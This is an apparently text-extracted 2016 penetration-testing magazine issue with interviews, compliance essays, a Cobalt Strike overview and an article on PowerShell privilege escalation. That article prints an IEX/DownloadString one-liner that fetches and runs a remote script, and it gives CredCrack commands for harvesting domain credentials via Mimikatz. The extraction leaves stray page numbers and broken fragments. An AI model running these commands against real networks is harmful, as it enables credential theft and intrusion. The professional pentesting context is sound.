Professional Documents
Culture Documents
PenTest OPEN. Trends in 2016
PenTest OPEN. Trends in 2016
TRENDS IN 2016
source:i.stack.imgur.com
Whilst every eort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concering the results of content usage. All trade marks presented
in the magazine were used only for informative purposes.
All rights to trade marks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only be used in
private, local networks. The editors hold no responsibility for
misuse of the presented techniques or consequent data loss.
Contents
I think it is a great space to be in right now and for the future
interview with Kai Pfiester founder of Black Cipher Security
10
13
20
24
27
by Martin Brough
29
32
by Tom Updegrove
36
KAI PFIESTER
[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?
[KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA
encryption pretty quickly. Multi-factor authentication based on physical and / or behavioral traits seems to
be the best approach to truly securing things. For instance, the banking industry is seriously considering
using a persons heartbeat to authenticate before granting access to certain financial services.
[PT]: There seems to be a very strong push to get rid of passwords and replace them with more reliable
solutions. What do you think about that? Is that a move in the right direction?
[KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor
authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs
and video tapes were great when they first came out. They served their purpose well. But then came DVDs
and now we are streaming video directly to our screens. Passwords are in the same boat. With superpowerful GPU-based password cracking machines, freely available wordlists, rainbow tables, etc, many
common passwords can be cracked within a week to ten days. If passwords are accompanied by some
form of two-factor authentication the account they are protecting is pretty safe. But I imagine it
is only a matter of time before that obstacle is overcome.
[PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security specialists?
Do you find it's going to be harder to find a job in this area?
[KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and staffing for
cyber security. I imagine that there will be other sites like it and eventually there will be a clearing house, so
to speak, where you can find the talent that you are looking for. As for finding a job in this area, no, I dont
think it is going to be harder. You cannot go wrong by specializing in IT. You can almost always find a job. As
for the cyber security market, if you have the skills, there will always be work. Especially in the government
sector.
[PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near
future?
[KP]: As cyber security product vendors make products better at detecting the subtlest attacks, attackers
will be forced to evolve their attacks as well as their skillset. The human factor is always going to play a part
since humans are the ones that can make the greatest security technology in the world completely useless
by not configuring it correctly or by being social-engineered to turn it off. Leveraging Powershell in Windows
is also a growing attack vector as it does not trip AV. So I imagine using a systems tools against itself will
also play a part in the types of attacks we see a lot of in the future.
[PT]: Following previous question, do you find tools we have are good enough to ensure complete
protection of a company?
[KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There is
great security awareness training available for people so that is covered. There is also highly-effective data
security technologies as well as policies that govern how IT equipment and data should
be handled. So what, then, is the problem? The problem is that rarely are all three of these factors
implemented together into a solid cyber security defense strategy. When they are, a data breach is
an extremely rare occurrence, if it ever is.
[PT]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?
[KP]: As more and more people get into the field we are going to see some really cool tools
be developed. I also think we are going to see more frameworks like SET and Metasploit be released.
When parents have only one child, that child has no one to learn from. Most of his or her knowledge comes
from single-handed experience. But the next child born into the family not only learns from their own
experience, but learns from the other child as well. So the second childs skillset develops faster than the
first childs skillset. We have the same situation with pen testing and vulnerability analysis
as well. These fields are young and the elders have set the stage with all their hard work and contributions.
But I think the younger generation is going to improve and build upon the current foundation and develop
tools that will be super effective in bypassing todays defense technologies.
[PT]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?
[KP]: Never be so arrogant that you think you are unhackable or not worth an attackers time
or attention. I once had a business lead at a certain company and after talking to the companys IT guy, he
basically told me that he had all the companys cyber security under control. At that point, I said OK and let
it be. Six weeks later I get a call from him. He was in panic mode because his network had been hacked.
They noticed more bandwidth than normal was being eaten up and tracked it to a specific server. Upon
further investigation it had been hacked and was turned into a spam server. After checking the timestamps
on certain files, it was determined that his network was hacked prior to, and during, the time he told me that
he had all the networks security under control and didnt need my help. True security requires humility and
constant vigilance.
source:hospitalitynet.org
One of the predictions in 2016 is that it will be a year of Hacking the Code. Not
DaVinci Code, computer code. This code contains vulnerabilities and its being
exploited with underlying integrations and connections to various enterpriseclass systems.
The second prediction is that we will be seeing cybersecurity and incident
response automation. This relates to the notorious erroneous nature of human
beings, despite genuine talent, that creates this automation and digital world we
know today.
Penetration testing is, by many, already considered to be a commodity tactic today.
To achieve the best results, a pentester needs to combine various strategies, from leveraging the power
of top-notch automated tools, a combination of manual and automated testing, writing their own tools
for new technologies, a solid knowledge of the systems attacked, as well as scripting, social
engineering, to dark web spider-intelligence, and more. Many popular penetration testing tools help
penetration testers with creating fancy-looking reports that leave a great impression (and resonate well)
with the client. Tools then combine online dark web data, perimeters, systems, and application layers
in one beautiful report with its own scoring schema. Oftentimes, the driving force
of penetration testing is a need to be in compliance with regulations instead of a genuine decision to
actually improve security.
The benefits of using automated tools are great and it is always a good idea to be equipped with the
best tools available that can help automate the work as much as possible. You could almost think of
it as a scripted set of testing attacks with payload parameters. This is where we see the industry going.
They do not have to be commercial. A great momentum exists in the open source community, including
OWASP. Of course, with even more automation, there will still be a major dierence in the quality of
work between top penetration testers and an automated scan -a vulnerability scan does not equal
a pentest. The shift towards automation, however, can be a cost-ecient alternative for companies
looking to save on basic penetration testing services and a good way for any penetration testers
looking to save time and be more ecient.
One peculiar nightmare of automated tools is the ratio of false positives followed by ranking and
an interpretation of findings. Humans are still needed to properly categorize and eliminate false
positives. Tools provide learning capabilities are far away from the popular terms of machine learning
and intelligence, however.
10
Mobile Devices -iOS, Android, or Windows based native applications, as well as a hybrid
application assessment will become more and more important as the use of mobile devices will be
gradually shifting from entertainment to business use and processing financial and other sensitive data.
-to
assess security of such applications there will be a need to combine the classic crawling and scanning
with a web browser engine, JavaScript debugger, forward/backward tracer, unpacking/de-obfuscation
snapshots comparer, a script based state/variable alerting, injecting and fuzzing.
Wireless systems -Software-defined radio (SDR) based wireless security assessments, WiFi,
smart meters, wearable devices, etc. - all this will require specific tools and skillsets.
Machine learning
counter-measures.
Internal network pentesting -will be used more as companies realize that to penetrate
their internal networks using social engineering is a real possibility.
Social engineering
a possibility that an automated robot can get to a company building and ask somebody to "print his
resume" from an USB drive.
Remanence of Zeitgeist-old era are **legacy systems** with a plethora of well-humming and rather
dated production deployment out there are great examples of pentester need. These systems will
continue to require pentesting, which will not deviate greatly from currently-proven methodologies, and
a skilled pentester is crucial for those precise military snipermissions.
We do believe that in the near future and beyond (at least until the time when applications are fully
developed and auto-improved by autonomous artificially intelligent agents), it will still be the human
genius and intelligence, in-depth understanding, and ecient utilization of automated tools, which will
determine the most successful pentesting outcomes. Terminator is an interesting concept and a movie,
11
only time will show how far an artificial intelligence will get and if the human genius will replace itself by
fully automated systems. Do not forget, in the present days, it is the human hacking skillset that so far
won the race against machines.
JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and
digital forensics firm. He started his career in software development with
focus on security and later moved to Information Security, focusing
on system audits, security/risk assessments, penetration testing, incident
response to hacked web applications, and overall security.
He has almost two decades of cybersecurity experience, including
vulnerability assessment, secure code review, cloud-based penetration
testing, digital risk assessment, digital evidence acquisition, investigation
of web attacks, security assessments of Internet-facing applications,
penetration tests across internal networks, development of testing scripts
and procedures, and digital forensics. Jaro worked on many high-profile
cases, including a much publicized Box.com and Dropbox leakage.
ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital
forensics firm. With over two decades of experience in computer security and
forensics, he conducted a wide range of investigations, including data
breached through computer intrusions, theft of intellectual property, massive
deletions, defragmentation, file carvings, anti-money laundering, financial
fraud, mathematical modeling and computer hacking.
Ondrejs experience also includes advanced network penetration testing,
database security testing, physical security assessments, logical security
audits, wireless network penetration testing, and providing recommendations
for operational eciency of approaches. He is one of the few security experts
in the world holding the Certified Ethical Hacker Instructor Certification (CEI).
Ondrej worked on many high-profile cases, including a much publicized
12
Privilege escalation is a task that proves difficult at times. In the past, one would
rely heavily on metasploit as the full exploitation suite. With metasploit, one
would not only be able to exploit a vulnerability but quickly elevate privileges
with the get system command. However, with the landscape of cybersecurity
constantly changing, it was only a matter of time before network administrators
implemented new technological advancements that would detect and prevent
most metasploit payloads. With one of pentesters favorite tools now being
detected, pentesters needed to find an alternative solution.
13
Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer
required. An era where one can execute shellcode or obtain credentials in the clear without touching
the file system. Welcome to the era of pentesting with PowerShell.
This article aims to provide a technical introduction on how to use PowerShell to quickly escalate
privileges on Windows operating systems.
There is an error when the script is run locally since PowerShells execution policy is set to restricted.
This means that no PowerShell scripts can be run.
Figure 1: PowerShell execution error
However, if the script is uploaded to a webserver and DownloadString is used, PowerShells execution
policy is bypassed.
Table 2: Example of PowerShellsDownloadString functionality
PS >IEX (New-Object Net.WebClient).DownloadString(http://gojhonny.com/pentestmag/ipconfig.ps1)
14
Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with
the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts
are the Invoke-Shellcode and Invoke-MImikatz scripts. Both scripts may be found on
MattGraebersGithub(https://github.com/mattifestation).
After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.
15
The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively
obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator
credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.
A U T O M AT I N G P R I V I L E G E E S C A L AT I O N W I T H
CREDCRACK
Pentesters love automation, in fact we love automating as many things as possible. Thankfully, there
are tools that have been created to automate exploitation and privilege escalation and make the lives
of pentesters easier. With great tools, such as Empire, PowerUp and CredCrack, one may go from
domain user to domain administrator in seconds. The following section will demonstrate how to use
CredCrack, a popular credential harvesting script.
CredCrack was created and released by myself, Jonathan Broche, in August of 2015(http://blog.gojohnny.com/
201508/domain-administrator-in-17-seconds.html). Since then, it has become a popular tool amongst pentesters and
with the online community. CredCrack has two main functionalities: share enumeration and credential
harvesting.
Table 5: CredCrack's help menu
16
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
[-l LHOST] [-t THREADS]
CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)
optional arguments:
-h, --help
show this help message and exit
-f FILE, --file FILEFile containing IPs to harvest creds from. One IP per
line.
-r RHOST, --rhost RHOST
Remote host IP to harvest creds from.
-es, --enumshares Examine share access on the remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Once domain user credentials have been compromised, it is recommended to use CredCracks share
enumeration functionality to identify systems the compromised user has administrative access to.
The share enumeration functionality uses the SMB protocol to test shares for write access on the
systems provided.Systems that grant read/write access to its administrative share (C$) indicate that
the user has local administrative access.
Figure 6: Enumerating share access with CredCrack
After using the share enumeration functionality, the pentesterwould create a list of systems with
administrative access and feed them into CredCracks credential harvesting functionality.
17
Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials
in a POST request to the pentester's system.
Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester
After all victims have finished the execution of Mimikatz, CredCrackwill search for any matches against
the domain administrator's list to see if a domain administrator account was obtained and if so, output
the accounts credentials.
18
Domain administrator in just 10.9 seconds! CredCrack has proven to be one of the fastest ways to
escalate privileges in large enterprise environments and is just one example of the several powerful
tools available for pentesters today.
CONCLUSION
There are several ways to escalate privileges on a network and the aforementioned tools are just
a handful of them. The cyber security landscape is always changing and there is always something to
be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from
researching new methodologies and building the next best tool!
About the author:
JONATHAN H. BROCHE
computer security professional with over ten years of hands-on experience in the
Information Technology field. He specializes in penetration testing, social
engineering and system security configurations. Jonathan has a bachelor's degree
in Information Technology from Florida International University with concentrations
in application development and UNIX administration. Additionally, he has earned
certifications from Oensive Security (OSCE, OSCP, OSWP) and the Global
Information Assurance Council (GSEC).
Jonathan is also a researcher, writer and speaker. His latest contribution to the
industry is the renowned CredCrack tool which gained international attention upon
its release. Jonathan is an active member of several security-related organizations
such as local ISSA and OWASP chapters and frequently participates in capture
the flag events. In his free time he enjoys mountain biking.
19
INTRODUCTION
In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that
Utilities are focusing on regulatory compliance instead of comprehensive security and that security
requirements are inherently incomplete, and having a culture that views the security problem as being
solved once those requirements are met will leave an organization vulnerable to cyber-attack.It is not
only utilities that suffer from this problem; in the last 18 months, over 150 million credit cards numbers
and protected health records have been stolen from companies that had all been found compliant
in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus
(to name only a few) have learned just how short of true security a compliant program can leave you.
In regulated industries, it has become common practice for management to assume that compliance and
security are one and the same. They believe that because an auditor has marked them as being
compliant, there are no further actions that need to be taken to secure their systems. The idea that
because something is compliant, it must also be secure has become an inside joke among security
professionals;unfortunately, those same professionals are often incapable of translating to management
exactly why a compliant system is not necessarily secure.
20
However, it is also
important for the
penetration tester to
be aware of and
knowledgeable about
the regulations with
which their client must
comply
It is no secret that many companies value third party input much
more highly than they do internal recommendations. A request
that has been made multiple times from a security team may
sudden be fulfilled if it comes as a recommendation in a third
party report. As such, it is often the responsibility of the
penetration tester to identify the areas where management has
been lax in assigning resources and prioritize their
recommendations accordingly. If it is clear that large amounts of
21
the security budget is being directed towards a brand new Security Incident and Event Manager (SIEM),
but the security staff doesnt have the knowledge or training to support that SIEM, it is important for the
penetration tester to recognize this and recommend training for the security staff.
Writing a report that recommends changes that fall far outside the scope of the clients compliance
needs is as likely to create meaningful change as not writing the report at all. On the other hand, if the
report can be aligned with the clients compliance goals, it becomes far more likely that management
and the security team will utilize it to achieve not only greater security, but also stronger compliance.
23
source:http://cdn.cfo.com
become apparent once the organization actually looks more deeply at the nature of the testing, how
it was initiated and performed.
It is important to regularly ask questions of the SI such as how deep was the testing and how was the
scope validated? When you look at the small print of what was actually agreed, you may find the level
of testing agreed to was actually only superficial and mostly automated scanning hardly real
penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not
engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the
more subtle issues. Unless the organization employs specialists who examine or validate the level
of testing, there may be an assumption that everything is fine as penetration testing is completed
regularly.
Scope is another important factor. The SI will typically be very good at keeping a complete and up
to date list of all the assets being managed, as that is effectively their only way of accurately calculating
the service costs, so it is in their interests to manage that list well. What the asset list does not do,
however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe
it is effective as long as the organization has kept the SI informed of which applications or data sets
may be considered as within a PCI scope. This is not always something that is as black and white as
it should be, for not all organizations have cleanly defined network scopes or security zones. For those
organizations where a PCI scope may bleed into other networks due to applications being connected to
the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things
may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the
annual testing.
Regulatory requirements are also evolving and generally this tends towards stricter security controls
which can result in additional complexity. Introducing a requirement to perform authenticated testing, for
example in PCI v3, creates a need to perform Penetration Testing in a very different way on some
systems. For applications that require authentication, it can be very difficult to obtain credentials for the
SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements
around who can get access or how the access must be provided. If this is a new requirement for which
the organization has never previously had to deal with, especially outside of its pre-production testing
networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this
will take time. The contract between the organization and the SI may simply not accommodate this at all,
but the time to find this out is not a few weeks before the regulatory audit is due!
When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and
the service is not generally questioned. Service reporting is often all green indicating all deliverables are
on track; afterall, thats what you pay an SI for to deliver the contracted service on time. You dont
generally get an independent attestation as to quality, or careful validation that it is meeting the real
security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is
incredibly important for the organization to either employ people with the necessary skills to validate the
quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration
Testing organization who can provide a baseline to identify service gaps.
If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize
the actual deliverables, then the governance over the scope and quality of testing should never
be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially
PCI, may mean its time to renegotiate the contract with the SI and to seek a regular independent view
to ensure they stay on track.
About the author:
JIM HART
A seasoned Security Professional who has developed and honed his skills
over the past 15 years in security. A consummate specialist who has
successfully transformed from a highly skilled technical engineer, to Manager
of a team of security analysts (UK and matrix-managed those in India),
through consulting and then transitioning into a business development role
delivering thought-leadership for major clients information security
requirements within an Enterprise sales team of a Fortune500 security
software and service provider.
26
Pentesting
a true art form
by Martin Brough
Pentesting is truly an art form that I have studied for most of my life, however,
pentesting is a dying art form that needs to be resuscitated! I dont mean that
people are no longer using them; in fact, its just the opposite.
I have noticed that over the past five years, annual pentesting is working its way from being thought
of as something you just do to meet (enter acronym here) compliance to standard IT security practice.
Within the past two years, I have noticed a significant increase in companies adding annual pentests
into their contracts with companies that handle their data. Companies that oer services such as SaaS,
cloud data storage, outsourced web development and media management are now all being required
by contract to participate in both annual audits of their systems and penetration tests to ensure their
data is secure. So what do I mean by Pentesting is a dying art form? I meant that pentesting is
a highly skilled practice and should be conducted by professionals who have been trained and know
what they are looking for and how to test your company's systems. It seems that every script-kiddie
with a Kali box these days will tell you they are a pentester!
27
I think its really important to convey a few key points about penetration tests; 1. A Pentest does not
make your company un-hackable. The main objective of a well-done pentest is to reduce your attack
surface. Your goal as a company should be to allow the specialized team conducting the pentest, to
treat your network as though they were a real attacker trying to get in. You want to find as many holes
in your network as you can and close them. 2.Put as few restrictions on the pentesters as possible. A
recent trend I have noticed in the past year has been companies that are contractually obligated to
have these tests done but see them as a burden and dramatically limit the network exposure that the
teams are allowed to have. This makes the results of your pentest borderline useless. One example I
have seen of this is when told I can give them a report of my web application scans but under no
circumstances am I to exploit any vulnerability found. Exploitation not only helps to find the directions
of traversal after gaining access but also tests any scanners, firewalls and loggers that are in place to
see if they are configured to pick up on these kinds of events, so it is very important to allow the
pentesters to run a full pentest against your defenses. And finally number 3. After all is said and done,
your pentest is complete and your attack surface reduced and you have your certificate in hand, spend
the next 364 days maintaining the hard work you just put in. Patch your systems, check your logs, and
always verify your code.
28
MARTIN VOELK
Martin is an IT Security veteran with 18 years of experience
in the IT industry. Prior to setting up CYBER 51 in 2009, Martin
was already regularly teaching Penetration Testing Training
Courses, Cisco authorized Security Courses and was regularly
engaged by governments and other businesses to establish
Security policies, perform Ethical Hacking and Penetration Tests
in order to secure network infrastructures and to remediate the
threats encountered.
29
[PM]: What is the major diculty in working with such dierent companies and sectors?
[MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with customer.
In some occasions, especially in larger companies, internal engineers become very defensive when being
confronted with results. However, its not our aim to finger point. We merely uncover holes and help
customers becoming more secure. On other occasions, the more we find, the more it is appreciated.
Another big challenge is governmental work as it often requires very specific skills and certifications but the
consultant holds a wrong passport. This can be very frustrating at times as, for example, only a UK citizen is
allowed to perform the work for a UK government client.
[PM]: From your own experience, do you prefer to work with smaller or bigger companies?
[MV]: We prefer mid size to large size.
[PM]: I can see your company provides great initiative: free educational sessions for children. Can you
tell us more about this idea?
[MV]: Those are little awareness workshops for children at schools. We started that program in Mexico
where one of our offices is. We teach children how to stay safe when using laptops, smartphones, pads,
social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable for
kids.
[PM]: What are your general thoughts about development of cyber security market?
[MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social
Engineering), Web Applications, Mobile Apps and Wireless.
[PM]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?
[MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications will
become more sophisticated and need more testing and the mobile market brings its own new challenges in
Wireless and Apps.
[PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security specialists?
Do you find it's going to be harder to find a job in this area?
[MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile,
Colombia and Panama). We also engage in the UK market but very little in other countries. For us the
biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and
employers in the US actually often struggle to find the right skills available.
The top 3 criteria :
30
- OSPC certified or better (OSCE etc.) The Offensive Security Certifications are the best ones in the market
and we hire OSCPs over CEH, because the OSCP is a hands on and very challenging exam. Someone
who passed that exam is a real pentester who also can do reporting
- - Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the
guys outside the US dont come with great English language skills.
- Integrity, working to timelines and reliability.
[PM]: Everyday we can hear about new attacks. How do you see cyber threats evolving in the near
future?
[MV]: It will remain a never ending cat and mouse game. The trends are shifting more to organized crime
and away from individual guys. Some of the attacks we have seen at customers require teams of highly
skilled experts and tools and a lot of the underworld has created and is creating task forces for certain jobs.
A lot more challenging to tackle than the lone hacker or script kiddie.
[PM]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?
[MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin
American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting. Also
a lot of companies start realizing that technical defense isnt everything and that social engineering makes
up a lot of the breaches. User education and enforcement of policies will become a much bigger part.
[PM]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?
[MV]: Think of security as a wheel and a never ending circle. A traditional pentest (Network and Web App) is
not good enough anymore these days. Pentesting should include mobile App, Wireless, Bluetooth and
Social Engineering. For aspiring pentesters and existing pentesters, do the Offensive Security Certified
Professional (OSCP) certification. Its very well recognized in the industry and weeds out the theory from the
hands on folks.
31
I started to write this article about one of my favorite security tools Cobalt
Strike but as I delved into the history and thinking behind Cobalt Strike I
realized that a better story lies beneath the surface. The real story is about
Pentesting and Adversarial Role Playing, which is thought to be the next stage
of Digital Security. Theres a whole new breed of White Hat Hackers and they
belong to Threat Actors. Theres a whole new breed of White Hat Hackers and
they are called Threat Actors.
ARMITAGE
On the Armitage home page it says: Cyber Attack Management for Metasploit, but Armitage is more
than that. Armitage is a scriptable red team collaboration tool for Metasploit; that visualizes targets,
recommends exploits, and exposes the advanced post-exploitation features in the framework.
My first introduction to Metasploit was via the CLI, which was important to understand the framework.
How well one understands the Exploits, Payloads, Meterpreter, Auxiliary components and scripts
determines how well and eective the attack is. Seeing the same commands and getting feedback
visually is so much more helpful. More like listening to a TV show on radio then seeing it on 4K flat
screen in surround sound. Well maybe not that extreme but you get the idea.
32
COBALT STRIKE
Cobalt Strikeis like a grown up version of Armitage. According to its website, Cobalt Strike is for
Adversary Simulation and Red Team Operations. Versions 1.0 & 2.0 utilized the Metasploit Framework
and was one of the first usable GUI frontends for Metasploit. An important component of Cobalt Strike
is Beacon. Beacon is Cobalt Strike's payload to model advanced attackers. Use Beacon to egress
a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling
peer-to-peer Beacons over Windows named pipes (Cobalt Strike website). Another aspect of Cobalt
Strike is its social engineering features which allows the Actorto get a foothold, covert command and
control with Beacon, browser pivoting, and reporting to Armitage's existing exploitation and team
collaboration capabilities. Using Beacon you can tunnel Meterpreter commands and utilize all of the
Metasploit exploit and post exploit capabilities. Beacon facilitates the running of Power Shell scripts
over its connection; Python or Java for example. There is even an email phishing module that reports
when your recipients open the Phishing email you sent them.
RED TEAMS
According to Wikipedia A red team is an independent group that challenges an organization
to improve its eectiveness. The United States intelligence community (military and civilian) has red
teams that explore alternative futures and write articles as if they were foreign world leaders.Little
formal doctrine or publications about Red Teaming in the military exist.[1]
LtCol Brendan S. Mulvaney Marine Corps Gazette July 2012. "Strengthened Through the Challenge"(PDF).
33
-Long-term Operations
-War
G a m e s
34
As threat actors move deeper into the network, their movements and methods become dicult
to detect, especially when they utilize Windows features and tools typically used by IT administrators.
Gaining administrative privileges also makes threat actors activities undetected or even untraceable.
REMEDIATION
In the past few years, there have been a number of great industry reports written and statistics shared
on data breaches and investigations. Many of them focus on investigative findings and detection
trends. There has been less focus, however, on what is arguably the most transformative component
of an adversarial engagement the successful remediation and the maturation of an organizations
ability to detect and respond to attacks moving forward. How do attackers respond to remediation
actions, and what distinguishes successful organizations from those that were less successful?
A few points to consider;
-The average time for attackers to conduct reinfection attempts after an organization completes initial
remediation
-The percentage of organizations impacted by more than one attack group at a time
-The percentage of organizations who are detecting attacks internally versus those that are being
notified by third parties
-The factors that influence eective and ecient investigation and remediation
-Why some organizations remediate successfully and eciently, and why others struggle
THE TOOLS
The tool needs for Adversary Simulations are far dierent. A unique covert channel matters far more
than an unpatched exploit. A common element of Adversary Simulations is a white box assumed
breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain
compromise. The goal of the operator is to use this access to achieve eects and steal data in ways
that help exercise and prepare the security operations sta for what theyre really up against.
Remember too, that the threat actor in a production environment may also be an employee of the
company, acting inside the corporate network.
TRADECRAFT
Raphael Mudge uses the term Tradecraft to describe the mindset for Adversary Simulations. He says
that they require an appreciation for the ecacy that simply isnt there in the penetration testing
community yet. Tradecraft are the best practices of a modern Adversary. What is the adversarys
35
playbook? What checklists do they follow? Why do they do the things they do?-these are questions
that need to be asked by a corporates security defenders.
36
Impact of compliance
on information security
by Ayo Tayo Balogun
"Target was certified as meeting the standard for the payment card industry in
September 2013. Nonetheless, we suffered a data breach."Target Chairman,
President, and Chief Executive Officer Gregg Steinhaf
In Information Security, there are a plethora of Laws and Regulations: SarbanesOxley Act (SOX);
Payment Card Industry Data Security Standard (PCI DSS); GrammLeachBliley Act (GLB); Electronic
Fund Transfer Act, Regulation E (EFTA); CustomsTrade Partnership Against Terrorism (CTPAT); Free and
Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate
Credit Transaction Act (FACTA), including Red Flags Rule; Federal Rules of Civil Procedure (FRCP).
Some of the industryspecific Guidelines and Requirements include: Federal Information Security
Management Act (FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the
Code of Federal Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and
Accountability Act (HIPAA); The Health Information Technology for Economic and Clinical Health Act
(HITECH); Patient Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: The
Chemical Facility AntiTerrorism Standards Regulation. How many of these Regulations, Laws,
Guidelines a business needs to adhere to would depend on what part of the world the business
operates from (or is domiciled).
Laws, Regulations, Standards and Guidelines are very familiar words when it comes to Information
Security. One other word that ties all the previous words together is Compliance. Compliance, generally
speaking, is the basis for audits. Compliance is also the native language the Executive Management
of any enterprise understands. The great debate for us however is: does compliance really translate
to good security?
It creates the understanding, at all levels in the organization, that finding the appropriate balance
of availability, integrity and confidentiality requires a full appreciation of the risks.
The rush for Compliance has more or less taken center stage in recent times, and a lot of businesses
(and the people driving those businesses) forget or are unaware of the fact that Information Security
needs should primarily be the driving force for Compliance criteria/metrics; people would not just erect
the compliance barrier for its own sake. In order to achieve good security, appropriate processes,
practices and technologies need to be implemented. In 2014, the FBI sent a warning to the healthcare
industry that its data was not secure. The biggest vulnerability was the perception of IT healthcare
professionals beliefs that their current perimeter defenses and compliance strategies were working
when clearly the data states otherwise.
Lots of organizations focus on compliance and have several reams of paper to show for it policies,
procedures, and training records. Several of these organizations purchase compliance-in-a-box kits,
and because the focus is on compliance and not really security, much of the content of the compliancein-a-box kit still has the original blank spots where the name of the organization in question should have
been inserted. A lot of the organizations that eventually complete their documentation might never
incorporate the documentation into the corresponding process. Additionally, because assessment for
compliance might be primarily based on responding to hundreds of questions in compliance
assessment tools, or discussing with consultants, many businesses will maintain that the security
described in their policies and procedures is really in place. They might even believe it themselves!
Ensuring that the IT security team is knowledgeable and dedicated is also a major requirement that
needs to be addressed. One can never know how truly secure a system is until it has been tested. The
IT security team (complementary to the testing by external consultants) needs to routinely conduct
penetration testing exercises to evaluate every facet of the business process, not with the intention
of achieving regulatory compliance but with the objective of determining the security posture of the
business in order to apply any needed corrective measures before vulnerabilities are exploited by
hackers.
About the author:
AYO TAYO BALOGUN
39